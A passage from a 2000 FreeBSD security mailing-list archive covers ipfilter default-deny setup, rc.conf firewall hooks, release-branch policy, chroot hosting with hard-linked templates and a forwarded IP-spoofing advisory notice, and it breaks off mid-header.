Default Deny In-Reply-To: <200010060046.LAA09224@cairo.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Oct 2000, Darren Reed wrote: > You're assuming I have setup access to cvs for FreeBSD for everywhere that > I have access/accounts and that it'll still be on my mind when I'm in a > position to do so. You have no boxes with your CVS tree running SSH? ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tommorow?" BSD: "Are you guys coming or what?" ============================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:56:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 41B3737B502 for ; Thu, 5 Oct 2000 17:56:53 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id LAA11152; Fri, 6 Oct 2000 11:56:45 +1100 (EST) From: Darren Reed Message-Id: <200010060056.LAA11152@cairo.anu.edu.au> Subject: Re: Default Deny To: scanner@jurai.net Date: Fri, 6 Oct 2000 11:56:44 +1100 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "scanner@jurai.net" at Oct 05, 2000 08:49:42 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from scanner@jurai.net, sie said: > > On Fri, 6 Oct 2000, Darren Reed wrote: > > > You're assuming I have setup access to cvs for FreeBSD for everywhere that > > I have access/accounts and that it'll still be on my mind when I'm in a > > position to do so. > > You have no boxes with your CVS tree running SSH? Read what I said and then think about it rather than sending off a mindless reply. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 18: 0:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from amazhan.bitstream.net (amazhan.bitstream.net [216.243.128.132]) by hub.freebsd.org (Postfix) with SMTP id D22AD37B502 for ; Thu, 5 Oct 2000 18:00:41 -0700 (PDT) Received: (qmail 84062 invoked from network); 6 Oct 2000 01:00:40 -0000 Received: from unknown (HELO jah) (216.243.128.155) by amazhan with SMTP; 6 Oct 2000 01:00:40 -0000 Date: Thu, 5 Oct 2000 20:00:45 -0500 (CDT) From: Dan Debertin To: scanner@jurai.net Cc: freebsd-security@freebsd.org Subject: Re: Default Deny In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My, how topical to freebsd security this is. Look, a guy could have innumerable legitimate reasons for not being able to do this at the moment. You're being incredibly tiresome by belaboring Darren on-list. BTW -- your grammar/spelling are terrible. ~Dan D. -- ++ Dan Debertin ++ Senior Systems Administrator ++ Bitstream Underground, LLC ++ airboss@bitstream.net ++ (612)321-9290 On Thu, 5 Oct 2000 scanner@jurai.net wrote: > On Fri, 6 Oct 2000, Darren Reed wrote: > > > You're assuming I have setup access to cvs for FreeBSD for everywhere that > > I have access/accounts and that it'll still be on my mind when I'm in a > > position to do so. > > You have no boxes with your CVS tree running SSH? > > ============================================================================= > -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek > Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas > Home: scanner@deceptively.shady.org | http://open-systems.net > ============================================================================= > WINDOWS: "Where do you want to go today?" > LINUX: "Where do you want to go tommorow?" > BSD: "Are you guys coming or what?" > ============================================================================= > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 18: 1: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 92DEC37B503 for ; Thu, 5 Oct 2000 18:00:59 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id VAA03075; Thu, 5 Oct 2000 21:00:49 -0400 Message-ID: <39DCC1CB.5FDD7F90@allmaui.com> Date: Thu, 05 Oct 2000 18:00:43 +0000 From: Craig Cowen X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Darren Reed Cc: scanner@jurai.net, freebsd-security@FreeBSD.ORG Subject: Re: Default Deny References: <200010060056.LAA11152@cairo.anu.edu.au> Content-Type: multipart/alternative; boundary="------------ABCD0CD1D34BCD2C0E0A3EC7" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------ABCD0CD1D34BCD2C0E0A3EC7 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Would either of you take a moment from your bantering to answer a question I posted please? I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my kernel. When using ipnat, I have 'pass in on (private interface) from 192.168.0.0/24 to any keep state' in my rules. I have no rules specified for the public interface. The boxen behind the firewall can surf. Is this right and why. Seems to me I have to allow out on the public interface with keep state for it all to work. Darren Reed wrote: > In some mail from scanner@jurai.net, sie said: > > > > On Fri, 6 Oct 2000, Darren Reed wrote: > > > > > You're assuming I have setup access to cvs for FreeBSD for everywhere that > > > I have access/accounts and that it'll still be on my mind when I'm in a > > > position to do so. > > > > You have no boxes with your CVS tree running SSH? > > Read what I said and then think about it rather than sending > off a mindless reply. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Craig Cowen 408-394-6673 Cell craig-pager@allmaui.com --------------ABCD0CD1D34BCD2C0E0A3EC7 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Would either of you take a moment from your bantering to answer a question I posted please?

I have setup ipf with options  IPFILTER_DEFAULT_BLOCK in my kernel.
When using ipnat, I have 'pass in on (private interface) from 192.168.0.0/24 to any keep state' in my rules.

I have no rules specified for the public interface.
The boxen behind the firewall can surf.

Is this right and why.

Seems to me I have to allow out on the public interface with keep state for it all to work.
 

Darren Reed wrote:

In some mail from scanner@jurai.net, sie said:
>
> On Fri, 6 Oct 2000, Darren Reed wrote:
>
> > You're assuming I have setup access to cvs for FreeBSD for everywhere that
> > I have access/accounts and that it'll still be on my mind when I'm in a
> > position to do so.
>
>       You have no boxes with your CVS tree running SSH?

Read what I said and then think about it rather than sending
off a mindless reply.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

-- 
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com
  --------------ABCD0CD1D34BCD2C0E0A3EC7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 19:54: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2889C37B502; Thu, 5 Oct 2000 19:54:01 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id WAA57645; Thu, 5 Oct 2000 22:53:55 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Thu, 5 Oct 2000 22:53:55 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Jordan Hubbard Cc: John Baldwin , Brett Glass , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards , "David O'Brien" , Ralph Huntington Subject: Re: Stable branch In-Reply-To: <1275.970785509@winston.osd.bsdi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 5 Oct 2000, Jordan Hubbard wrote: > > 2) Make release tags into branches, so that ERRATA and other relevant > > That scares me. I don't like the idea of n-way merges. I'm not sure I see the n-way merge. When it's release time, you add -b to your release tag. When a fix is required, you merge it into -STABLE, and then if appropriate, into the release branch also. Most of the time, the release branch will only be touched for release-specific ERRATA, version number references, etc, and then occasionally for specifically back-ported security bugfixes or fixes related to release engineering botches. This means that after the release freeze ends, it's still possible to tweak the release in the CVS tree. I would anticipate few if any changes ever being made to a release branch, but it would provide people a way to synchronize with release patch levels using cvsup and so on, rather than having to manually apply patches, and the SO having to verify manually that patches apply to release versions as well as to -STABLE. This seems to reflect our various forms of customers: 1) I have a release, it has been tested extensively for production deployment, and I don't want to track -STABLE. I do want to be able to manage vital bug fixes and security fixes in this context. Upgrades and feature deployments are major events, meaning I need a stable code base that has been through a formal QA process. Answer: Track a specific RELEASE branch. Updates to the branch will be well tested, infrequent, and typically announced in the form of a security advisory or patch level announcement. 2) I have a release, and want to gradually pick up well-tested feature improvements over time, and avoid major jumps associated with version upgrades. I can tolerate a moving code base to gain these features, and when a security fix or vital bug fix comes out, I can afford a deployment process. Answer: Track a recent STABLE branch. Updates to the branch will be well tested, relatively frequent. 3) I'm an active developer or user willing to live on the edge in order to have access to, or assist in developing, new features in the FreeBSD operating system. Code changes don't scare me, I have ankles of steel that cannot be broken by errant committers. Answer: Track a recent CURRENT branch. Updates to the branch will be exciting, and quite frequent. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 20:20:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 0421D37B503; Thu, 5 Oct 2000 20:20:12 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e963K5X03179; Thu, 5 Oct 2000 20:20:05 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Robert Watson Cc: John Baldwin , Brett Glass , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards , "David O'Brien" , Ralph Huntington Subject: Re: Stable branch In-Reply-To: Message from Robert Watson of "Thu, 05 Oct 2000 22:53:55 EDT." Date: Thu, 05 Oct 2000 20:20:05 -0700 Message-ID: <3175.970802405@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I'm not sure I see the n-way merge. > .. > When a fix is required, you merge it into -STABLE, and then if > appropriate, into the release branch also. Which is the n-way aspect. You've just increased the amount of merging by n, where n is each active "release branch" you choose to support rather than being able to merge once to the branch head and point people at that. Sure, you can say it's only for the most minor patches and such and merge work will be minimal, but in order to support a user assumption that they can install release x and then stay on the release x branch from there on out, someone still has to remember to merge to several locations rather than one now. Ick. > 1) I have a release, it has been tested extensively for production > deployment, and I don't want to track -STABLE. I do want to be able to It's only because they really wanted to track -SOLID that they currently feel that way. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 21: 7:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 3B34937B66C for ; Thu, 5 Oct 2000 21:07:28 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id AAA02479 for ; Fri, 6 Oct 2000 00:07:27 -0400 Message-ID: <39DCED87.C7B7FA0B@allmaui.com> Date: Thu, 05 Oct 2000 21:07:20 +0000 From: Craig Cowen X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: IPFILTER Question Content-Type: multipart/alternative; boundary="------------79612B08DA6CBB83953CBFBD" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------79612B08DA6CBB83953CBFBD Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my kernel. When using ipnat, I have 'pass in on (private interface) from 192.168.0.0/24 to any keep state' in my rules. I have no rules specified for the public interface. The boxen behind the firewall can surf. Is this right and why. Seems to me I have to allow out on the public interface with keep state for it all to work. -- Craig Cowen 408-394-6673 Cell craig-pager@allmaui.com --------------79612B08DA6CBB83953CBFBD Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit  
I have setup ipf with options  IPFILTER_DEFAULT_BLOCK in my kernel.
When using ipnat, I have 'pass in on (private interface) from 192.168.0.0/24 to any keep state' in my rules.

I have no rules specified for the public interface.
The boxen behind the firewall can surf.

Is this right and why.

Seems to me I have to allow out on the public interface with keep state for it all to work.
  

-- 
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com
  --------------79612B08DA6CBB83953CBFBD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 21:48:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from ego.mind.net (ego.mind.net [206.99.66.9]) by hub.freebsd.org (Postfix) with ESMTP id 04C7E37B502; Thu, 5 Oct 2000 21:48:05 -0700 (PDT) Received: from takhus-home.ashlandfn.org (AFN-Dyn-6315110844.pc.ashlandfiber.net [63.151.108.44]) by ego.mind.net (8.9.3/8.9.3) with ESMTP id VAA17135; Thu, 5 Oct 2000 21:48:00 -0700 Received: from localhost (fleisher@localhost) by takhus-home.ashlandfn.org (8.11.0/8.11.0) with ESMTP id e964lkF13361; Thu, 5 Oct 2000 21:47:46 -0700 (PDT) (envelope-from takhus@takhus.mind.net) X-Authentication-Warning: takhus-home.ashlandfn.org: fleisher owned process doing -bs Date: Thu, 5 Oct 2000 21:47:46 -0700 (PDT) From: Tony Fleisher X-Sender: fleisher@takhus-home.ashlandfn.org To: Brett Glass Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG, Ralph Huntington Subject: Re: Stable branch In-Reply-To: <4.3.2.7.2.20001005105420.04a7b540@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 5 Oct 2000, Brett Glass wrote: > At 04:06 AM 10/5/2000, Ralph Huntington wrote: > > >Stable branch is very important for production use and should incorporate > >bug fixes and security patches, but not feature enhancements. The extent > >of support and maintenance for stable should be one major release prior to > >the latest release (not current), i.e., since 4.x-RELEASE is the latest, > >then 3.x-STABLE hould be supported with bug fixes and security patches > >until a 5.x-RELEASE is out. > > > >Does this seem unreasonable? -=r=- > > > Perhaps this should be formalized as three branches: > > Branch name: Bug/security New features? "Breakable" for > fixes? a day or more? > > -PRODUCTION YES NO NO > > -STABLE YES YES, PREFERABLY NO > AFTER TESTING > IN -CURRENT > > -DEVELOPMENT YES YES YES > (formerly -CURRENT) > > What do you think of this as a model for what people seem to be > asking for? > > --Brett I have been watching this thread, and I was just about to write in suggesting nearly this exact same model when I saw your post. It certainly seems that there are two very distinct groups of people tracking -stable: those wanting new features, new hardware, etc., and those wanting simply updates for security patches and bug fixes. It seems that there are enough people in both groups that are not willing to deal with all the risks that -current brings with it that dividing -stable into two tracks seems to be the only solution to meet the needs/desires of these two groups. I also agree that support and, at least security related, maintenance should continue for one major release back, as suggested by Ralph previously. It seems that this is not too much to ask (in fact seems to be happening already, based on the MFCs to RELENG_3), and making that the "official" position may help FreeBSD gain more support in the corporate environments where an upgrade every six months is really not feasible. Just my thoughts, TOny. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 23:46:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 74EE437B66C; Thu, 5 Oct 2000 23:46:26 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id NAA80996; Fri, 6 Oct 2000 13:43:42 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Fri, 6 Oct 2000 13:43:42 +0700 (NSS) From: Max Khon To: Neil Blakey-Milner Cc: Brett Glass , Warner Losh , developers@FreeBSD.org, security@FreeBSD.org Subject: Re: Stable branch In-Reply-To: <20001006014106.A97336@mithrandr.moria.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Fri, 6 Oct 2000, Neil Blakey-Milner wrote: > > >Otherwise would do a PR spin with the following patch to 3.x would do > > >the trick (I'd call it -solid, because -stable is suitable for > > >production machines). > > > > Personally, I would equate "-SOLID" with "suitable for production > > machines" whereas -STABLE would be "OK for application developers > > and eager/early adopters but still settling down to the confidence > > level of -SOLID." > > > > Which might imply setting things up so that the -STABLE branch > > becomes -SOLID after, say, a good .2 release. > > Then people will say, "Oh no, it's the first -SOLID release, we should > only start using it after two -SOLID releases". I think ERRATA's for releases should be maintained more actively (they should contain all bug fixes) so that -SOLID will be -RELEASE + patches applied from ERRATA /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 1: 7: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id ACF8D37B502 for ; Fri, 6 Oct 2000 01:07:05 -0700 (PDT) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id KAA09584; Fri, 6 Oct 2000 10:06:56 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Roman Shterenzon Cc: Craig Cowen , freebsd-security@FreeBSD.ORG Subject: Re: Default Deny References: From: Dag-Erling Smorgrav Date: 06 Oct 2000 10:06:56 +0200 In-Reply-To: Roman Shterenzon's message of "Fri, 6 Oct 2000 02:40:08 +0200 (IST)" Message-ID: Lines: 16 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roman Shterenzon writes: > The ipfilter in freebsd seems cursed or abandoned. > Example: this option is not documented. > Another example: there're no hooks to start ipfilter from /etc/rc* > eventhough there's PR: 20202 Put this in your rc.conf: firewall_enable="YES" firewall_script="/etc/firewall" Where /etc/firewall is a shell script that sets up your firewall. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 1:55:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id ED1B937B502 for ; Fri, 6 Oct 2000 01:54:45 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hTHE-000794-00; Fri, 06 Oct 2000 10:54:48 +0200 Date: Fri, 6 Oct 2000 10:54:48 +0200 (IST) From: Roman Shterenzon To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: Default Deny In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 6 Oct 2000, Dag-Erling Smorgrav wrote: > Roman Shterenzon writes: > > The ipfilter in freebsd seems cursed or abandoned. > > Example: this option is not documented. > > Another example: there're no hooks to start ipfilter from /etc/rc* > > eventhough there's PR: 20202 > > Put this in your rc.conf: > > firewall_enable="YES" > firewall_script="/etc/firewall" > > Where /etc/firewall is a shell script that sets up your firewall. Excerpt from /etc/rc.network: case ${firewall_enable} in [Yy][Ee][Ss]) if [ "${firewall_in_kernel}" -eq 0 ] && kldload ipfw; then firewall_in_kernel=1 echo "Kernel firewall module loaded." elif [ "${firewall_in_kernel}" -eq 0 ]; then echo "Warning: firewall kernel module failed to load." fi ;; esac .. So obviously this hook is not really right. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 2:15:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CA7C537B502 for ; Fri, 6 Oct 2000 02:15:43 -0700 (PDT) Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by mx1.FreeBSD.org (Postfix) with ESMTP id 83F436E3467 for ; Fri, 6 Oct 2000 02:15:43 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id CAA91888; Fri, 6 Oct 2000 02:08:22 -0700 (PDT) Date: Fri, 6 Oct 2000 02:08:21 -0700 From: Kris Kennaway To: Bart_van_Leeuwen@doosys.com Cc: "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL Message-ID: <20001006020820.A91130@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from Bart_van_Leeuwen@doosys.com on Thu, Oct 05, 2000 at 02:25:11PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Oct 05, 2000 at 02:25:11PM +0200, Bart_van_Leeuwen@doosys.com wrote: > Creating a single jail for a group of interactive users is quite practical. > Creating a seperate jail for each individual interactive user can become > inpractical for example due to disk space requirements and the > complexibility of the evironment for the administrator. Read-only nullfs mounts might be good enough for a relatively few number of users (they're working in -current nowadays). It would be interesting to try and do this in practice and see if it's usable, and if not, why not. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 4:17:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 1B1BD37B66D for ; Fri, 6 Oct 2000 04:17:03 -0700 (PDT) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id NAA10286; Fri, 6 Oct 2000 13:15:42 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Kris Kennaway Cc: Bart_van_Leeuwen@doosys.com, "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL References: <20001006020820.A91130@citusc17.usc.edu> From: Dag-Erling Smorgrav Date: 06 Oct 2000 13:15:42 +0200 In-Reply-To: Kris Kennaway's message of "Fri, 6 Oct 2000 02:08:21 -0700" Message-ID: Lines: 21 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway writes: > Read-only nullfs mounts might be good enough for a relatively few > number of users (they're working in -current nowadays). It would be > interesting to try and do this in practice and see if it's usable, and > if not, why not. At my previous place of employment, I implemented a system for running separate virtual hosts' CGI scripts in separate chroot trees (no jail, this was on 3.x and only moved to 4.x a week or two before I quit). I had a tree template that included a minimal set of binaries, libraries and configuration files (resolv.conf, passwd, group etc.). The setup script (written in Perl) would create hard links between the template and the user's tree, so very little additional disk space was needed for each user. If you needed to change something in the template, you could run the setup script again and it would compare inode numbers and relink files that had changed. Naturally, none of the shared files were writable by any of the users. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5: 5:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id E0F1D37B502 for ; Fri, 6 Oct 2000 05:05:38 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id JAA80734; Fri, 6 Oct 2000 09:07:17 -0300 (ART) From: Fernando Schapachnik Message-Id: <200010061207.JAA80734@ns1.via-net-works.net.ar> Subject: Re: IPFILTER Question In-Reply-To: <39DCED87.C7B7FA0B@allmaui.com> "from Craig Cowen at Oct 5, 2000 09:07:20 pm" To: Craig Cowen Date: Fri, 6 Oct 2000 09:07:17 -0300 (ART) Cc: "freebsd-security@FreeBSD.ORG" Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Why don't you put a deny log rule for the outside iface and see what happens? Good luck! En un mensaje anterior, Craig Cowen escribió: > > I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my kernel. > When using ipnat, I have 'pass in on (private interface) from > 192.168.0.0/24 to any keep state' in my rules. > > I have no rules specified for the public interface. > The boxen behind the firewall can surf. Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5:10:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id DB9E737B66C for ; Fri, 6 Oct 2000 05:10:49 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id JAA83234 for security@freebsd.org; Fri, 6 Oct 2000 09:12:54 -0300 (ART) From: Fernando Schapachnik Message-Id: <200010061212.JAA83234@ns1.via-net-works.net.ar> Subject: HERT advisory: FreeBSD IP Spoofing (fwd) To: security@freebsd.org Date: Fri, 6 Oct 2000 09:12:54 -0300 (ART) Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Many of you may have read this. It states that 4.1 is vulnerable, but doesn't mention 4.1.1. It also provides URL to patches that are not accesible. Somebody has more info? TIA! ----- Forwarded message from Pascal Bouchareine ----- From owner-bugtraq@SECURITYFOCUS.COM Thu Oct 5 20:40:56 2000 Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com Content-Disposition: inline User-Agent: Mutt/1.2.5i Message-ID: <20001005205149.A24599@plan9.hert.org> Date: Thu, 5 Oct 2000 20:51:49 +0200 Reply-To: Pascal Bouchareine Sender: Bugtraq List From: Pascal Bouchareine Subject: HERT advisory: FreeBSD IP Spoofing To: BUGTRAQ@SECURITYFOCUS.COM Content-Length: 176 Hi, This has just been fixed in FreeBSD current, release, and stable. -- pub 1024D/98F6C473 2000-08-14 Pascal Bouchareine (kalou) [ Attachment, skipping... ] ----- End of forwarded message from Pascal Bouchareine ----- Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5:17:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from surreal.nl (surreal.nl [212.204.236.10]) by hub.freebsd.org (Postfix) with ESMTP id 9681E37B502 for ; Fri, 6 Oct 2000 05:17:38 -0700 (PDT) Received: by surreal.nl (Postfix, from userid 1000) id D06A31DA8A; Tue, 3 Oct 2000 03:40:54 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by surreal.nl (Postfix) with ESMTP id CD6BE1DA89; Tue, 3 Oct 2000 03:40:54 +0200 (CEST) Date: Tue, 3 Oct 2000 03:40:54 +0200 (CEST) From: Walter Hop To: Michael 